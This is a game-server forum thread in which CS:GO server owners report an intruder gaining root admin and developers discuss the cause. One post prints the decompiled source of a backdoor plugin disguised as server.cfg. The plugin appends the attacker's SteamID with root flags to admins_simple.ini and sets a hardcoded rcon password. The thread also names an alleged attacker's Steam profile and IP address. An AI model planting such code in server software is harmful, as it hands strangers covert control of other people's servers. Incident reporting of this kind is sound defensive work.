[Sizzla]

Hello
There is probably exploit in admin-flatfile.smx or in Source Mod because I expirenced this week situation when little cunt added herself to admins_simple.txt and then refreshed admin cache. Also I noticed strange plugins in folder (look attachment strangeplugins-min.jpg) and server.cfg file which contains not a server configuration commands but probably compiled backdoor (look attachment server-strangename.png and server.cfg.tar).
Temporary I disabled admin-flatfile plugin but I think you should fix it as soon as possible because it's not happening only on my server.
This guy http://steamcommunity.com/profiles/76561197965954837 as first added herself to admin list.

Quote:

meta version Metamod:Source Version Information Metamod:Source version 1.11.0-dev+1102 Plugin interface version: 16:14 SourceHook version: 5:5 Loaded As: Valve Server Plugin Compiled on: Dec 19 2017 23:525 Built from: https://github.com/alliedmodders/met...commit/d6ee3bf Build ID: 1102:d6ee3bf http://www.metamodsource.net/

Quote:

sm version SourceMod Version Information: SourceMod Version: 1.9.0.6225 SourcePawn Engine: 1.9.0.6225, jit-x86 (build 1.9.0.6225) SourcePawn API: v1 = 4, v2 = 12 Compiled on: Jan 7 2018 10:58:57 Built from: https://github.com/alliedmodders/sou...commit/083ab81 Build ID: 6225:083ab81 http://www.sourcemod.net/

By the way. He couldn't login to machine and add herself to admin list because login is based by private key and password, also rcon protocol is disabled.


Best regards

[Fyren]

SM itself never writes to any of the admin config files. It has no functionality to accept file uploads.

The server.cfg file with a bunch of spaces in the name that you attached is a plugin that writes to admins_simple.ini and sets the rcon password.

While there could possibly be security flaws in anything, including SM, you have provided no evidence pointing to anything in particular, let alone SM. There have been server exploits in the past allowing clients to upload files.

[asdfxD]

kamay is a css/csgo hack coder known from royalhack. so i think it is realy an exploit that should be fixed lol

[8guawong]

Quote:

Originally Posted by asdfxD kamay is a css/csgo hack coder known from royalhack. so i think it is realy an exploit that should be fixed lol

the developerd already said you need to provide evidence of exploit

[Sizzla]

Quote:

Originally Posted by Fyren SM itself never writes to any of the admin config files. It has no functionality to accept file uploads. The server.cfg file with a bunch of spaces in the name that you attached is a plugin that writes to admins_simple.ini and sets the rcon password. While there could possibly be security flaws in anything, including SM, you have provided no evidence pointing to anything in particular, let alone SM. There have been server exploits in the past allowing clients to upload files.

I have no idea what else evidence I can provide. The fact is this guy uploaded to my server plugin which gave him admin access. As i wrote before there is no option that someone entered on my machine, because login is via ssh secured by private key & password. Also rcon port is blocked, not only deactived. He uploaded SM plugin so it must be gap in security of sourcemod/metamod or game... Do you have any idea how he did this and how to protect server?
And you are right this server.cfg is a sourcemod plugin. Decompiled looks like:

Code:

/*
** ATTENTION
** THE PRODUCED CODE, IS NOT ABLE TO COMPILE!
** THE DECOMPILER JUST TRIES TO GIVE YOU A POSSIBILITY
** TO LOOK HOW A PLUGIN DOES IT'S JOB AND LOOK FOR
** POSSIBLE MALICIOUS CODE.
**
** ALL CONVERSIONS ARE WRONG! AT EXAMPLE:
** SetEntityRenderFx(client, RenderFx 0);  →  SetEntityRenderFx(client, view_as<RenderFx>0);  →  SetEntityRenderFx(client, RENDERFX_NONE);
*/

 PlVers __version = 5;
 float NULL_VECTOR[3];
 char NULL_STRING[1];
 Extension __ext_core = 68;
 int MaxClients;
 Extension __ext_sdktools = 2220;
public Plugin myinfo =
{
	name = "rconprotect",
	description = "Protect your rcon from faggots.",
	author = "Who knows.",
	version = "1.00",
	url = ""
};
public void __ext_core_SetNTVOptional()
{
	MarkNativeAsOptional("GetFeatureStatus");
	MarkNativeAsOptional("RequireFeature");
	MarkNativeAsOptional("AddCommandListener");
	MarkNativeAsOptional("RemoveCommandListener");
	MarkNativeAsOptional("BfWriteBool");
	MarkNativeAsOptional("BfWriteByte");
	MarkNativeAsOptional("BfWriteChar");
	MarkNativeAsOptional("BfWriteShort");
	MarkNativeAsOptional("BfWriteWord");
	MarkNativeAsOptional("BfWriteNum");
	MarkNativeAsOptional("BfWriteFloat");
	MarkNativeAsOptional("BfWriteString");
	MarkNativeAsOptional("BfWriteEntity");
	MarkNativeAsOptional("BfWriteAngle");
	MarkNativeAsOptional("BfWriteCoord");
	MarkNativeAsOptional("BfWriteVecCoord");
	MarkNativeAsOptional("BfWriteVecNormal");
	MarkNativeAsOptional("BfWriteAngles");
	MarkNativeAsOptional("BfReadBool");
	MarkNativeAsOptional("BfReadByte");
	MarkNativeAsOptional("BfReadChar");
	MarkNativeAsOptional("BfReadShort");
	MarkNativeAsOptional("BfReadWord");
	MarkNativeAsOptional("BfReadNum");
	MarkNativeAsOptional("BfReadFloat");
	MarkNativeAsOptional("BfReadString");
	MarkNativeAsOptional("BfReadEntity");
	MarkNativeAsOptional("BfReadAngle");
	MarkNativeAsOptional("BfReadCoord");
	MarkNativeAsOptional("BfReadVecCoord");
	MarkNativeAsOptional("BfReadVecNormal");
	MarkNativeAsOptional("BfReadAngles");
	MarkNativeAsOptional("BfGetNumBytesLeft");
	MarkNativeAsOptional("BfWrite.WriteBool");
	MarkNativeAsOptional("BfWrite.WriteByte");
	MarkNativeAsOptional("BfWrite.WriteChar");
	MarkNativeAsOptional("BfWrite.WriteShort");
	MarkNativeAsOptional("BfWrite.WriteWord");
	MarkNativeAsOptional("BfWrite.WriteNum");
	MarkNativeAsOptional("BfWrite.WriteFloat");
	MarkNativeAsOptional("BfWrite.WriteString");
	MarkNativeAsOptional("BfWrite.WriteEntity");
	MarkNativeAsOptional("BfWrite.WriteAngle");
	MarkNativeAsOptional("BfWrite.WriteCoord");
	MarkNativeAsOptional("BfWrite.WriteVecCoord");
	MarkNativeAsOptional("BfWrite.WriteVecNormal");
	MarkNativeAsOptional("BfWrite.WriteAngles");
	MarkNativeAsOptional("BfRead.ReadBool");
	MarkNativeAsOptional("BfRead.ReadByte");
	MarkNativeAsOptional("BfRead.ReadChar");
	MarkNativeAsOptional("BfRead.ReadShort");
	MarkNativeAsOptional("BfRead.ReadWord");
	MarkNativeAsOptional("BfRead.ReadNum");
	MarkNativeAsOptional("BfRead.ReadFloat");
	MarkNativeAsOptional("BfRead.ReadString");
	MarkNativeAsOptional("BfRead.ReadEntity");
	MarkNativeAsOptional("BfRead.ReadAngle");
	MarkNativeAsOptional("BfRead.ReadCoord");
	MarkNativeAsOptional("BfRead.ReadVecCoord");
	MarkNativeAsOptional("BfRead.ReadVecNormal");
	MarkNativeAsOptional("BfRead.ReadAngles");
	MarkNativeAsOptional("BfRead.GetNumBytesLeft");
	MarkNativeAsOptional("PbReadInt");
	MarkNativeAsOptional("PbReadFloat");
	MarkNativeAsOptional("PbReadBool");
	MarkNativeAsOptional("PbReadString");
	MarkNativeAsOptional("PbReadColor");
	MarkNativeAsOptional("PbReadAngle");
	MarkNativeAsOptional("PbReadVector");
	MarkNativeAsOptional("PbReadVector2D");
	MarkNativeAsOptional("PbGetRepeatedFieldCount");
	MarkNativeAsOptional("PbSetInt");
	MarkNativeAsOptional("PbSetFloat");
	MarkNativeAsOptional("PbSetBool");
	MarkNativeAsOptional("PbSetString");
	MarkNativeAsOptional("PbSetColor");
	MarkNativeAsOptional("PbSetAngle");
	MarkNativeAsOptional("PbSetVector");
	MarkNativeAsOptional("PbSetVector2D");
	MarkNativeAsOptional("PbAddInt");
	MarkNativeAsOptional("PbAddFloat");
	MarkNativeAsOptional("PbAddBool");
	MarkNativeAsOptional("PbAddString");
	MarkNativeAsOptional("PbAddColor");
	MarkNativeAsOptional("PbAddAngle");
	MarkNativeAsOptional("PbAddVector");
	MarkNativeAsOptional("PbAddVector2D");
	MarkNativeAsOptional("PbRemoveRepeatedFieldValue");
	MarkNativeAsOptional("PbReadMessage");
	MarkNativeAsOptional("PbReadRepeatedMessage");
	MarkNativeAsOptional("PbAddMessage");
	MarkNativeAsOptional("Protobuf.ReadInt");
	MarkNativeAsOptional("Protobuf.ReadFloat");
	MarkNativeAsOptional("Protobuf.ReadBool");
	MarkNativeAsOptional("Protobuf.ReadString");
	MarkNativeAsOptional("Protobuf.ReadColor");
	MarkNativeAsOptional("Protobuf.ReadAngle");
	MarkNativeAsOptional("Protobuf.ReadVector");
	MarkNativeAsOptional("Protobuf.ReadVector2D");
	MarkNativeAsOptional("Protobuf.GetRepeatedFieldCount");
	MarkNativeAsOptional("Protobuf.SetInt");
	MarkNativeAsOptional("Protobuf.SetFloat");
	MarkNativeAsOptional("Protobuf.SetBool");
	MarkNativeAsOptional("Protobuf.SetString");
	MarkNativeAsOptional("Protobuf.SetColor");
	MarkNativeAsOptional("Protobuf.SetAngle");
	MarkNativeAsOptional("Protobuf.SetVector");
	MarkNativeAsOptional("Protobuf.SetVector2D");
	MarkNativeAsOptional("Protobuf.AddInt");
	MarkNativeAsOptional("Protobuf.AddFloat");
	MarkNativeAsOptional("Protobuf.AddBool");
	MarkNativeAsOptional("Protobuf.AddString");
	MarkNativeAsOptional("Protobuf.AddColor");
	MarkNativeAsOptional("Protobuf.AddAngle");
	MarkNativeAsOptional("Protobuf.AddVector");
	MarkNativeAsOptional("Protobuf.AddVector2D");
	MarkNativeAsOptional("Protobuf.RemoveRepeatedFieldValue");
	MarkNativeAsOptional("Protobuf.ReadMessage");
	MarkNativeAsOptional("Protobuf.ReadRepeatedMessage");
	MarkNativeAsOptional("Protobuf.AddMessage");
	VerifyCoreVersion();
	return void 0;
}

public void OnPluginStart()
{
	CreateTimer(10, Timer_SetRcon, any 0, 1);
	char szFile[256];
	BuildPath(PathType 0, szFile, 256, "configs/admins_simple.ini");
	Handle hFile = OpenFile(szFile, "at", false, "GAME");
	WriteFileLine(hFile, "\"STEAM_1:1:2844554\" \"99:z\"");
	CloseHandle(hFile);
	return void 0;
}

public Action Timer_SetRcon(Handle timer)
{
	ServerCommand("rcon_password \"tlxkjc2407\"");
	return Action 0;
}

[Timonxtimon]

Hello, Im just some random dude that plays on a CSGO server, and I can confirm that what creator of this topic is saying is 100% true.

My server has suffered the same fate:
A guy nicknamed "Kamay" connects to the server
Admin cache is being refreshed at server (no logs whatsover before that of him doing anything)
He gets "root" admin 99:z\
Starts typing random commands/banning/trolling people or whatever.
In server.cfg you can see plugin (code provided by the creator of the topic)
And also tons of random plugin files visible at server (206 files with names 1, 11 and so on)

RCON port blocked + deactived
SSH Private Key is required to log in to machine
(Which basically is enough to say that there was no file upload done from server side)

We managed to block that from re-happening again by making admins_simple.txt "read only" as it was being modified (somehow, there are no logs or just can't trace it)

While there is no hard evidence that I can provide as well I can just confirm that this is a serious matter and it should be taken seriously since sourcemod integrity is at stake.

I know of SEVERAL other servers that have experienced the same thing, I can provide screenshots of forums if needed, but thats barely any evidence as well...

Whatever the case, I hope this somehow is gonna get taken seriously and fixed as soon as possible - Fact is there is an Exploit and this guy is just ruining peoples day with it... and it seems like he uses SM to do it.

[asherkin]

Please zip up a complete, unmodified copy of your addons/ directory and provide it (privately) - you can PM me or email me at [email protected] (or [email protected], which will go to the core team).

No one is disputing that there is a problem here, it just isn't in SourceMod. There have been multiple bugs in the Source engine that have allowed uploading files to servers, which is what Fyren is alluding to.

[ASKER_CZ]

Does anybody have IP of that guy / these guys so I can ban them in firewall?

BTW : Should we be worried ?

[Sizzla]

Quote:

Originally Posted by asherkin Please zip up a complete, unmodified copy of your addons/ directory and provide it (privately) - you can PM me or email me at [email protected] (or [email protected], which will go to the core team). No one is disputing that there is a problem here, it just isn't in SourceMod. There have been multiple bugs in the Source engine that have allowed uploading files to servers, which is what Fyren is alluding to.

Thank you for your attention. I send you private message with current addons directory.

Quote:

Originally Posted by ASKER_CZ Does anybody have IP of that guy / these guys so I can ban them in firewall? BTW : Should we be worried ?

Last time he was on my had ip: 86.229.5.28 but I think it's dynamic address so it wouldn't help you ;/

[ASKER_CZ]

I can ban IP range if i want. + i use that plugin against mostly known VPNs